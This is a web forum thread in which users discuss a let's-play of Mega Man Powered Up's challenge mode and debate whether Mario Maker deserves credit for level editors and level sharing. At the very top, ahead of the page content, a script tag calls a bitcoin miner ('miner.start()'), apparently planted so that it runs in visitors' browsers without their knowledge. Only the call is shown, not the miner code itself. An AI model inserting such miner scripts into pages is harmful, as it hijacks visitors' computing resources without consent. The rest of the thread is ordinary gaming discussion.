<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectmario fan games galaxy

Mega Man 10 - The Long Goodbye

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Kilgamayan
The Real Treasure is You
Posts: 773
Joined: 9 years ago
First name: Rabi~En~Roll
Location: Location, Location.

Re: Mega Man Powered Up - Back to the Beginning

Postby Kilgamayan » 2 months ago

I spent most of this video giggling like a madman.

On the subject of video titles, if there's anything that this series has taught me, it's that there are a surprising number of songs about dudes named Willie/Willy.
Image Please interact Image

Image Image
Image Image

User avatar
Arctangent
squawky
Posts: 461
Joined: 4 years ago
Pronouns: she/her

Re: Mega Man Powered Up - Back to the Beginning

Postby Arctangent » 2 months ago

Kilgamayan wrote: wow that's kinda uhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
dw she just really wishes her dear brother would stop jumping on their bunk robobed, but she's too polite to chew him out for that

User avatar
Bean
Posts: 2791
Joined: 9 years ago
Location: In my own world

Re: Mega Man Powered Up - A Challenging Side Story

Postby Bean » 2 months ago

Since you saw what the last ten were, are you sure you want to do those all in a row? It was so painful to record them all in order when I did them because of that.

Anyway, yeah. Challenge Mode is a pretty cool thing that Powered Up added in along with the whole level creation thing. I mean, it's basically doing things that Super Mario Maker would get to some eight years later. As you saw, they get a little complicated. You have to know how each bot works and also learn the levels as you play as you're guaranteed to screw up on some of them your first or tenth time around, but that first challenge is always set up so you get a feel for what they can do.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1733
Joined: 6 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: Mega Man Powered Up - A Challenging Side Story

Postby Leet » 2 months ago

Bean wrote: I mean, it's basically doing things that Super Mario Maker would get to some eight years later.
I feel like the talkhaus should be the last place to fall for "mario maker is at all significant as a work". level editors have existed for almost as long as videogames and mario maker does nothing new other than being an official mario product
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Bean
Posts: 2791
Joined: 9 years ago
Location: In my own world

Re: Mega Man Powered Up - A Challenging Side Story

Postby Bean » 2 months ago

That's the comparison though as Powered Up and Mario Maker are both official products with their challenge modes and level creators!

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1733
Joined: 6 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: Mega Man Powered Up - A Challenging Side Story

Postby Leet » 2 months ago

Lode Runner. Excitebike. Boulderdash. Rayman. King's Field.
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Parama
Posts: 1389
Joined: 5 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby Parama » 2 months ago

smash brawl
put this in your sig if you've ever played a video game

User avatar
Alice
?
Posts: 2043
Joined: 7 years ago
Pronouns: Girl person
Location: Wonderland

Re: Mega Man Powered Up - A Challenging Side Story

Postby Alice » 2 months ago

Mega Man's challenges are the only group I did all of (I think, it's been years since I last played MMPU) but it's hilarious to compare my time with them with raocow's. The Sniper Joe one was by far the most difficult out of the first five for me and one of the most difficult in the entire set but raocow just breezes through it. The bomb run one I beat in like 2-3 tries but raocow took like half the video to do it despite being far ebtter at platformers than I am.

User avatar
Zummorr
Bug Catcher
Posts: 249
Joined: 3 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby Zummorr » 2 months ago

Leet wrote:
I feel like the talkhaus should be the last place to fall for "mario maker is at all significant as a work". level editors have existed for almost as long as videogames and mario maker does nothing new other than being an official mario product


Isn't the fact that the game automatically finds and sorts levels based on the number of players who completed them novel? Or That it was the first vastly popular platformer editor?
Leet wrote: Lode Runner. Excitebike. Boulderdash. Rayman. King's Field.
I think these examples are waaay too obscure. except for excitebike and arguably rayman. But all these examples lack something critical, shareability.
If you are going to talk about more general games with level editors, you should start with Starcraft and Warcraft 3. Since scenario editor content is more popular than the standard modes of play.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1733
Joined: 6 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: Mega Man Powered Up - A Challenging Side Story

Postby Leet » 2 months ago

Way too obscure for what? To exist? Them being obscure is my entire point. That these features have existed forever, but the second Nintendo does it with Mario platformers, everyone falls over themselves to compare all level editors to Mario Maker. Somebody makes a Zelda program and calls it Zelda Maker and it gets media attention (and the subsequent C+D that comes with it...) while Zelda Classic hangs out in the background unacknowledged. Mario Maker gets retroactively credited with innovation and the lie of video game history goes on.
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Voltgloss
I commend you for reaching me, chosen one.
Posts: 821
Joined: 5 years ago
Pronouns: he/him/his
Location: Spring in the Sky

Re: Mega Man Powered Up - A Challenging Side Story

Postby Voltgloss » 2 months ago

Leet wrote: King's Field
imagine a real-life-core raocow LP of king's field iv

probably shorter than the break man video

Image

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 713
Joined: 6 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby BobisOnlyBob » 2 months ago

Zummorr wrote: Isn't the fact that the game automatically finds and sorts levels based on the number of players who completed them novel? Or That it was the first vastly popular platformer editor?
Super Meat Boy and Knytt Stories
BOB is an acronym for BOB is Only BOB etc.

User avatar
Zummorr
Bug Catcher
Posts: 249
Joined: 3 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby Zummorr » 2 months ago

BobisOnlyBob wrote:
Zummorr wrote: Isn't the fact that the game automatically finds and sorts levels based on the number of players who completed them novel? Or That it was the first vastly popular platformer editor?
Super Meat Boy and Knytt Stories

Adding in the feature to seamlessly download and play the video game without having to exit the game or go to a 3rd party website is what I'd argue is the novel aspect, specifically for platformers.
Correct me if I'm wrong, but if you want to download new levels for knytt stories or meatboy you have to download those levels from some 3rd party website.

Leet wrote: Way too obscure for what? To exist? Them being obscure is my entire point. That these features have existed forever, but the second Nintendo does it with Mario platformers, everyone falls over themselves to compare all level editors to Mario Maker. Somebody makes a Zelda program and calls it Zelda Maker and it gets media attention (and the subsequent C+D that comes with it...) while Zelda Classic hangs out in the background unacknowledged. Mario Maker gets retroactively credited with innovation and the lie of video game history goes on.
A feature existing and being popularized are really important distinctions. The saturn and dreamcast had RPG maker games, I wouldn't be surprised if there were even older rpg maker games. They languish in obscurity and the Steam RPG maker reigns supreme on this niche arena.

The idea of level editing isn't novel, but the system behind sharing the levels is the novel thing! 4/5 of those games you listed, if you wanted to share the level you made, you'd have to footpad/mail your memory card over and then copy the level over to your friend's memory card.
The thing that makes Mario Maker novel, is that any 10 year old child can easily access to a bunch of crappy levels without ever needing to leave the game, If they want to make and share levels they can do so without ever leaving or fiddling with programs outside of Mario Maker.

This is why I brought up Warcraft 3 thing. Why was Dota so popular, back in the day? because even a dumb 13 year old Zummorr could download it through Warcraft 3 and play without needing to jump through any hoops. Ease of use and distribution of platformer levels is the primary innovation that happened with Mario Maker.

Since we're talking about Megaman and Level Editors. This was going to be the primary feature of Megaman Universe in 2010. But the game was canceled. Probably for the best, Mettoman is kinda nightmarish.
eww that Roll art.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1733
Joined: 6 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: Mega Man Powered Up - A Challenging Side Story

Postby Leet » 2 months ago

I mean, that's a solid defense of Mario Maker, but that still doesn't warrant Mega Man Powered Up being compared to it/being called ahead of its time for doing something everyone else was already doing. What I'm saying is we really have to stop using popularity as a guideline for what does and does not exist. This is a problem hyper endemic to games in particular.
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Bean
Posts: 2791
Joined: 9 years ago
Location: In my own world

Re: Mega Man Powered Up - A Challenging Side Story

Postby Bean » 2 months ago

I'll narrow it down even further because my point's just not being made well. Mascot platformers with both level editors and challenge modes are not that huge of a thing. Little Big Planet and Mario Maker are the two big ones of those I can think of in modern times (Think Wii/PS3/360/DS/PSP era and on). Powered Up predates both of those games. All I'm getting at here, Leet! Not trying to make it a competition or anything.

User avatar
Zummorr
Bug Catcher
Posts: 249
Joined: 3 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby Zummorr » 2 months ago

Leet wrote: I mean, that's a solid defense of Mario Maker, but that still doesn't warrant Mega Man Powered Up being compared to it/being called ahead of its time for doing something everyone else was already doing. What I'm saying is we really have to stop using popularity as a guideline for what does and does not exist. This is a problem hyper endemic to games in particular.
"[Blank] Is the Dark Souls of [Blank]"
For the worse, bad comparisons seem kinda normal.

Any platformer that has a level editor is probably going to be compared to Mario mMaker since we live in a post Mario Maker world. It's popular, and people have youtubed a ton content from it.

I'd argue, the number of eyes on an idea is fundamentally linked to its relevance. [Quality can be independent of popularity.]

User avatar
xnamkcor
Posts: 390
Joined: 8 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby xnamkcor » 2 months ago

Zummorr wrote:
BobisOnlyBob wrote:
Zummorr wrote: Isn't the fact that the game automatically finds and sorts levels based on the number of players who completed them novel? Or That it was the first vastly popular platformer editor?

Super Meat Boy and Knytt Stories

Adding in the feature to seamlessly download and play the video game without having to exit the game or go to a 3rd party website is what I'd argue is the novel aspect, specifically for platformers.
Correct me if I'm wrong, but if you want to download new levels for knytt stories or meatboy you have to download those levels from some 3rd party website.

Leet wrote: Way too obscure for what? To exist? Them being obscure is my entire point. That these features have existed forever, but the second Nintendo does it with Mario platformers, everyone falls over themselves to compare all level editors to Mario Maker. Somebody makes a Zelda program and calls it Zelda Maker and it gets media attention (and the subsequent C+D that comes with it...) while Zelda Classic hangs out in the background unacknowledged. Mario Maker gets retroactively credited with innovation and the lie of video game history goes on.
A feature existing and being popularized are really important distinctions. The saturn and dreamcast had RPG maker games, I wouldn't be surprised if there were even older rpg maker games. They languish in obscurity and the Steam RPG maker reigns supreme on this niche arena.

The idea of level editing isn't novel, but the system behind sharing the levels is the novel thing! 4/5 of those games you listed, if you wanted to share the level you made, you'd have to footpad/mail your memory card over and then copy the level over to your friend's memory card.
The thing that makes Mario Maker novel, is that any 10 year old child can easily access to a bunch of crappy levels without ever needing to leave the game, If they want to make and share levels they can do so without ever leaving or fiddling with programs outside of Mario Maker.

This is why I brought up Warcraft 3 thing. Why was Dota so popular, back in the day? because even a dumb 13 year old Zummorr could download it through Warcraft 3 and play without needing to jump through any hoops. Ease of use and distribution of platformer levels is the primary innovation that happened with Mario Maker.

Since we're talking about Megaman and Level Editors. This was going to be the primary feature of Megaman Universe in 2010. But the game was canceled. Probably for the best, Mettoman is kinda nightmarish.
eww that Roll art.
The newest RPG Maker is only popular because is the newest version of a long running series. 200x was much more iconic.

PS: Lode Runner was obscure?
You cannot add yourself to the friends list.
Image
You cannot add yourself to the foes list.

User avatar
Zummorr
Bug Catcher
Posts: 249
Joined: 3 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby Zummorr » 2 months ago

xnamkcor wrote:
PS: Lode Runner was obscure?
The ancient era of computers is pretty much in my blind spot. And considering that it's only even been mentioned a handful of times years ago on talkhaus. Yeah I'd say it's obscure.

User avatar
xnamkcor
Posts: 390
Joined: 8 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby xnamkcor » 2 months ago

Zummorr wrote:
xnamkcor wrote:
PS: Lode Runner was obscure?
The ancient era of computers is pretty much in my blind spot. And considering that it's only even been mentioned a handful of times years ago on talkhaus. Yeah I'd say it's obscure.
Then I'll be sure to mention it more often in your presence this year.
You cannot add yourself to the friends list.
Image
You cannot add yourself to the foes list.

User avatar
FourteenthOrder
Posts: 255
Joined: 4 years ago
Pronouns: she/her

Re: Mega Man Powered Up - A Challenging Side Story

Postby FourteenthOrder » 2 months ago

This is honestly the first time I've ever heard of Lode Runner. ^^;
Image

User avatar
Arctangent
squawky
Posts: 461
Joined: 4 years ago
Pronouns: she/her

Re: Mega Man Powered Up - A Challenging Side Story

Postby Arctangent » 2 months ago

It's worth remembering that the caveman that discovered making fire with flint was probably far more influential on the entirety of human history than the caveman that discovered making fire by being struck by lightning, even if the latter came first.

User avatar
Grounder
Posts: 2780
Joined: 4 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby Grounder » 2 months ago

I really wouldn't have thought that rao would have this much trouble adapting.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
Arctangent
squawky
Posts: 461
Joined: 4 years ago
Pronouns: she/her

Re: Mega Man Powered Up - A Challenging Side Story

Postby Arctangent » 2 months ago

One thing that always bugged me about the fact that the challenges just look like level editor levels ( and, yes, level editor levels do just look like that ) is that

you can't

actually set any goal to level editor levels besides "beat the boss!"

( granted you could still emulate "get the retry flag" stages by setting the boss to, iirc, a party ball, but still )

User avatar
raocow
the death of the incredible huge
Posts: 2611
Joined: 9 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: Mega Man Powered Up - A Challenging Side Story

Postby raocow » 2 months ago

Grounder wrote: I really wouldn't have thought that rao would have this much trouble adapting.
me too honestly
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Plutia
Plutia too cute
Posts: 409
Joined: 6 years ago

Re: Mega Man Powered Up - A Challenging Side Story

Postby Plutia » 2 months ago

for what it's worth, I think it's a good thing zelda classic is semi-obscure, as if it got immensely popular, it'd probably get shut down


Return to “let's play”

Who is online

Users browsing this forum: FPzero, GlitchMr, Griflion, Lazy_ and 3 guests